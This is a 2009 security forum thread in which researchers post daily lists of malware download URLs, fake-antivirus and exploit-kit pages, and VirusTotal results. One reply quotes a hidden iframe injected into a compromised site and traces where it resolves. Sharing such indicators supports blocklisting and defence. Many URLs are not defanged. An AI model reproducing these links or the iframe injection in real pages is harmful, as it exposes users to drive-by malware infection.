Author Topic: daily something......  (Read 832717 times)

0 Members and 2 Guests are viewing this topic.

June 28, 2009, 07:26:06 pm
Reply #480

cjeremy

  • Special Members
  • Full Member

  • Offline
  • *

  • 58
    • sudosecure
Some more fun:

Code: [Select]
http://mm.cj-vv.cn:8888/mm/lm/new1.exe
http://mm.cj-vv.cn:8888/mm/lm/new2.exe
http://mm.cj-vv.cn:8888/mm/lm/new4.exe
http://mm.cj-vv.cn:8888/mm/lm/new6.exe
http://mm.cj-vv.cn:8888/mm/lm/new7.exe
http://mm.cj-vv.cn:8888/mm/lm/new8.exe
http://mm.cj-vv.cn:8888/mm/lm/new9.exe
http://mm.cj-vv.cn:8888/mm/lm/new10.exe
http://mm.cj-vv.cn:8888/mm/lm/new11.exe
http://mm.cj-vv.cn:8888/mm/lm/new12.exe
http://mm.cj-vv.cn:8888/mm/lm/new14.exe
http://mm.cj-vv.cn:8888/mm/lm/new15.exe
http://mm.cj-vv.cn:8888/mm/lm/new16.exe
http://mm.cj-vv.cn:8888/mm/lm/new17.exe
http://mm.cj-vv.cn:8888/mm/lm/new20.exe
http://mm.cj-vv.cn:8888/mm/lm/new21.exe
http://mm.cj-vv.cn:8888/mm/lm/new23.exe
http://mm.cj-vv.cn:8888/mm/lm/new24.exe
http://mm.cj-vv.cn:8888/mm/lm/new25.exe
http://mm.cj-vv.cn:8888/mm/lm/new26.exe
http://mm.cj-vv.cn:8888/mm/jx/new3.exe
http://mm.cj-vv.cn:8888/mm/jx/new4.exe
http://mm.cj-vv.cn:8888/mm/jx/new5.exe
http://mm.cj-vv.cn:8888/mm/jx/new6.exe
http://mm.cj-vv.cn:8888/mm/jx/new7.exe
http://mm.cj-vv.cn:8888/mm/jx/new8.exe
http://mm.cj-vv.cn:8888/mm/jx/new11.exe
http://mm.cj-vv.cn:8888/mm/jx/new12.exe
http://mm.cj-vv.cn:8888/mm/jx/new13.exe


June 28, 2009, 09:54:04 pm
Reply #481

PaJamis

  • Special Access
  • Jr. Member

  • Offline
  • *

  • 14
Quote
hxxp://dcvs.chc.edu.tw/classfix/default.asp (Mal/Iframe-I)

June 28, 2009, 10:04:31 pm
Reply #482

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Can you double check that one please? (hostname is failing to resolve from several locations over here)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 29, 2009, 12:12:11 pm
Reply #483

promised

  • Jr. Member

  • Offline
  • **

  • 21
Code: [Select]
liesbethmilan.be/1/captcha6.exe
liesbethmilan.be/1/ms.19.exe

June 29, 2009, 01:32:28 pm
Reply #484

CM_MWR

  • Special Members
  • Hero Member

  • Offline
  • *

  • 319

June 29, 2009, 02:17:24 pm
Reply #485

philipp

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 218
Quote
Can you double check that one please? (hostname is failing to resolve from several locations over here)

Add a www to it or use google the domain name but there is more than just that one and cant see where any exploits popped out.   ???

After the closing html tag, i see the following:
Code: [Select]
<iframe src=http://www.3prince.com/kmdr/guest/images/_vti_cnf/tt/rp.htm width=30 height=0><div style="position: absolute; top: -999px;left: -999px;">
��������:
<a href="http://www.kryiyi.com">����һ��˽���l��վ</a>
<a href="http://www.61hj.com">Ӣ�ۺϓ�˽���l��վ</a>
<a href="http://www.reeltop.com">�ڿͽ��׾W</a>
<a href="http://www.941fc.com">����Ҫ�l??Ӱ�W</a>
<a href="http://www.ddoscc.cn">DDOS������,CC������˽�����������W�ɹ�����</a>
<a href="http://www.10004y.cn">�@���ӵ�˽��</a>
<a href="http://www.gfsj.org.cn">��������˽��</a>
<a href="http://www.3ky.org.cn">DDOS����?����DDOS���Rԭ����DDOS��������������ddos��������IP������</a>
<a href="http://1104f.cn">�@���ӵ�</a>
</div>

The iframed url returns http status code 404. I guess this is, where the exploits came from.

Most of the hosts resolve to 61.160.213.47, except of
w ww.941fc.com (NXDOMAIN)
w ww.ddoscc.cn (CNAME url.xundns.net -> 120.72.34.251)
w ww.10004y.cn (58.252.208.172)

w ww.ddoscc.cn returns:
Code: [Select]
HTTP/1.1 200 OK
Date: Mon, 29 Jun 2009 13:53:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 64
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCATCSDAA=DAOPAKFAOJEIFGHFMGKLFDLD; path=/
Cache-control: private


<meta http-equiv="refresh" content="0;url=http://ddoscc.cn">
ddoscc.cn again resolves to 61.160.213.47.

Trying to access these hosts on 61.160.213.47 always ends with the connection being interrupted/reset by the server.

w ww.10004y.cn does not contain anything malicious from a quick look.

June 30, 2009, 08:33:11 am
Reply #486

CkreM

  • Special Access
  • Hero Member

  • Offline
  • *

  • 567
Pinch:
Code: [Select]
turbina.net/modules/w/load/exec.phphttp://www.virustotal.com/analisis/2cb4599b35deaacebdb1746918564ace0ebb0560e0fc7d7e9e14703bcd8590ea-1246346258

Emold:
Code: [Select]
nat77.biz/123.exehttp://www.virustotal.com/analisis/1b379fc266bf6ea59a945d77b54a4945c39012020739e90a621d8c21a6b4c62a-1246348304
Code: [Select]
iframecash.net/cache/bin/main.exe http://www.virustotal.com/analisis/9fcdcd460db594f5143457b2c52acbe509fb2abefb713e77f2d91e0184aa8888-1246348532

Fake AV:
Code: [Select]
pornotube915.com/scan
Trojans:
Code: [Select]
hzone66.cn/preloader_9.exehttp://www.virustotal.com/analisis/beb6f3ed69235697bcbc018198fb0228d683da9a9a2943984b3b3ba7431b328d-1246333025
Code: [Select]
niph-kosova.org/server3.exehttp://www.virustotal.com/analisis/a5fd40f7a8c7686f68ead6219ed842e129f6200c70cb4d5e61d1f8de35cf5d5c-1246346783
Code: [Select]
91.189.113.210/t.exehttp://www.virustotal.com/analisis/4452581e37cb7aedcfc68d937988785cd6d55a938f267b4beb87f1227cbb2db3-1246347754
Code: [Select]
79.174.64.36/ldr.exehttp://www.virustotal.com/analisis/05cdd3f1b6a8a8ba47391b5506ef1fbddd361f85bf24d54887c48eae2eb28cba-1246347842
Code: [Select]
casinousa.cn/lsass.exehttp://www.virustotal.com/analisis/324b639b727842e2b6854915ea7cc5018fba336386a9773720e4520abb701751-1246347934
Code: [Select]
winsofter.ru/out.exehttp://www.virustotal.com/analisis/14bd1b39cc6c4e23ce4a2ebc5e94676e850e0a91caf03af8d1ab3e6dcc9377c7-1246348063
Code: [Select]
missing-codecs.net/download/install_flash_player.exehttp://www.virustotal.com/analisis/c90303b43ad53fb5a223a72d13256bf9175cd63013053ce5f4de4de4a8eaef0c-1246350478

Exploits(wepawet and jsunpack fail on this)
Code: [Select]
svazkusavip.com/counter/index.phpPDF:
Code: [Select]
svazkusavip.com/counter/dummyButAre.pdf flash:
Code: [Select]
svazkusavip.com/counter/alwaysWord.swftrojan(downloader):
Code: [Select]
svazkusavip.com/counter/update.phphttp://www.virustotal.com/analisis/ddc27e9df2e8cdae43d75c5a1db53b1876a47c219000d5735460496b5298c1a8-1246347509

Exploits(wepawet fails on this one)
Code: [Select]
nah77.biz/myy/index.phphttp://jsunpack.jeek.org/dec/go?url=nah77.biz_myy_index.php
PDF:
Code: [Select]
nah77.biz/myy/pdf.phpTrojan(emold):
Code: [Select]
nah77.biz/myy/load.phphttp://www.virustotal.com/analisis/5b2536fccffdcbaf1d6538e01f34cde8ce104b1bced4cc42d1b64d554283698f-1246349005

Exploits(wepawet and jsunpack fail on this)
Code: [Select]
imagehut5.cn/index.phpPDF:
Code: [Select]
imagehut5.cn/pdf.php?id=2Trojan:
Code: [Select]
imagehut5.cn/load.php?id=2http://www.virustotal.com/analisis/301a24d763c36477cfc192c27b95c83a4801f75f98f0f7c2a5fe86973e9d4422-1246349595

Trojan downloaded by the above(change tcpip.sys)
Code: [Select]
85.114.141.207/EvID4226Patch.exehttp://www.virustotal.com/analisis/0d78fc5700892aee90cd409716b2f6e1a844da5e85e563eaac631a58d8d0edc2-1246349673
Mal-Aware

July 01, 2009, 04:25:05 am
Reply #487

promised

  • Jr. Member

  • Offline
  • **

  • 21
Quote
2:http://mmdeai.3322.org/atievx.exe
2:http://milllk.com/wm/svchost.exe
2:http://havvvha.com/xiao/aa1.exe
2:http://havvvha.com/xiao/aa2.exe
2:http://havvvha.com/xiao/aa3.exe
2:http://havvvha.com/xiao/aa4.exe
1:http://havvvha.com/xiao/aa5.exe
2:http://havvvha.com/xiao/aa6.exe
2:http://havvvha.com/xiao/aa7.exe
2:http://havvvha.com/xiao/aa8.exe
2:http://havvvha.com/xiao/aa9.exe
2:http://havvvha.com/xiao/aa10.exe
2:http://havvvha.com/xiao/aa11.exe
2:http://havvvha.com/xiao/aa12.exe
2:http://havvvha.com/xiao/aa13.exe
2:http://havvvha.com/xiao/aa14.exe
2:http://havvvha.com/xiao/aa15.exe
2:http://havvvha.com/xiao/aa16.exe
2:http://havvvha.com/xiao/aa17.exe
2:http://havvvha.com/xiao/aa18.exe
2:http://havvvha.com/xiao/aa19.exe
2:http://havvvha.com/xiao/aa20.exe
2:http://havvvha.com/xiao/aa21.exe
2:http://havvvha.com/xiao/aa22.exe
2:http://havvvha.com/xiao/aa23.exe
2:http://havvvha.com/xiao/aa24.exe
2:http://havvvha.com/xiao/aa25.exe
2:http://havvvha.com/xiao/aa26.exe
2:http://havvvha.com/xiao/aa27.exe
2:http://havvvha.com/xiao/aa28.exe
2:http://havvvha.com/xiao/aa29.exe
2:http://havvvha.com/xiao/aa30.exe
2:http://havvvha.com/xiao/aa31.exe
2:http://havvvha.com/xiao/aa32.exe
2:http://havvvha.com/xiao/aa33.exe
2:http://havvvha.com/xiao/aa34.exe
2:http://havvvha.com/xiao/aa35.exe
2:http://havvvha.com/xiao/aa36.exe
2:http://havvvha.com/xiao/1.exe

July 01, 2009, 04:40:56 am
Reply #488

promised

  • Jr. Member

  • Offline
  • **

  • 21
Code: [Select]
121.12.115.11:886/cao/aa1.exe
121.12.115.11:886/cao/aa2.exe
121.12.115.11:886/cao/aa3.exe
121.12.115.11:886/cao/aa4.exe
121.12.115.11:886/cao/aa5.exe
121.12.115.11:886/cao/aa6.exe
121.12.115.11:886/cao/aa7.exe
121.12.115.11:886/cao/aa8.exe
121.12.115.11:886/cao/aa9.exe
121.12.115.11:886/cao/aa10.exe
121.12.115.11:886/cao/aa11.exe
121.12.115.11:886/cao/aa12.exe
121.12.115.11:886/cao/aa13.exe
121.12.115.11:886/cao/aa14.exe
121.12.115.11:886/cao/aa15.exe
121.12.115.11:886/cao/aa16.exe
121.12.115.11:886/cao/aa17.exe
121.12.115.11:886/cao/aa18.exe
121.12.115.11:886/cao/aa19.exe
121.12.115.11:886/cao/aa20.exe
121.12.115.11:886/cao/aa21.exe
121.12.115.11:886/cao/aa23.exe
121.12.115.11:886/cao/aa25.exe
121.12.115.11:886/cao/aa26.exe
121.12.115.11:886/cao/aa27.exe
121.12.115.11:886/cao/aa28.exe
121.12.115.11:886/cao/ms.exe
x9s7b.cn:8808/a/lzz.css
x9s7b.cn:8808/a/ms.css
x9s7b.cn:8808/a/real11.css

July 01, 2009, 06:15:23 am
Reply #489

CkreM

  • Special Access
  • Hero Member

  • Offline
  • *

  • 567
Fake AV:
Code: [Select]
pornotube914.com/scan
atoylev.cn/?wm=70321
Mal-Aware

July 01, 2009, 07:02:53 am
Reply #490

promised

  • Jr. Member

  • Offline
  • **

  • 21
Code: [Select]
mvt.c4.fr/a.css
mavr-best.com/ldr/bot.exe

July 01, 2009, 09:15:04 am
Reply #491

promised

  • Jr. Member

  • Offline
  • **

  • 21
Quote
pornotube915.com/codec/.exe
74.52.164.210/pk/bb090621.exe

July 01, 2009, 09:27:46 am
Reply #492

promised

  • Jr. Member

  • Offline
  • **

  • 21
Code: [Select]
megavipsite.cn/av/iframe/socks.exe
l3world.ru/l2.exe

July 01, 2009, 01:45:14 pm
Reply #493

promised

  • Jr. Member

  • Offline
  • **

  • 21
Quote
freett.com/950065/guama.exe
freett.com/950065/cq.exe
freett.com/950065/arp.exe
freett.com/950065/qn3.exe
freett.com/950065/pt.exe
freett.com/950065/hb1.exe
xoomer.alice.it/email02/bom.jpg
hxxp://www.fanv.cn/d.exe
hxxp://www.fei4.cn/aa.exe

July 01, 2009, 02:34:15 pm
Reply #494

promised

  • Jr. Member

  • Offline
  • **

  • 21
Quote
hxxp://x.b76.net/winres.exe
hxxp://web2.51.la/go.asp?svid=40&id=2941498&tpages=1&ttimes=1&tzone=8&tcolor=32&sSize=1280,1024&referrer=&vpage=hxxp%3A//stat.winrar2009.cn%3A88/ic.htm
hxxp://bewfsnfwka.net/uniq.php?id=1883789557&p=0
hxxp://bgukeumzwz.net/ccsuper1.php
hxxp://bgukeumzwz.net/ccsuper0.php
hxxp://web2.51.la/go.asp?svid=40&id=2941498&tpages=
hxxp://click0617.winrar2009.cn:88/files/click.jpg
hxxp://bgukeumzwz.net/ccsuper2.php
hxxp://www.51.la/?002941498
hxxp://heyjoy.cn/612.exe
hxxp://img.users.51.la/2941498.asp
hxxp://web2.51.la/go.asp?svid=40&id=2941498&tpages=2&ttimes=1&tzone=8&tcolor=32&sSize=1280,1024&referrer=&vpage=hxxp%3A//stat.winrar2009.cn%3A88/ic.htm
hxxp://www.51.la/?2941498
hxxp://web2.51.la/go.asp?svid=40&id=2941498&tpages=3&ttimes=1&tzone=8&tcolor=32&sSize=1280,1024&referrer=&vpage=hxxp%3A//stat.winrar2009.cn%3A88/ic.htm
hxxp://ppc0617.winrar2009.cn:88/d.txt
hxxp://bgukeumzwz.net/ccsuper3.php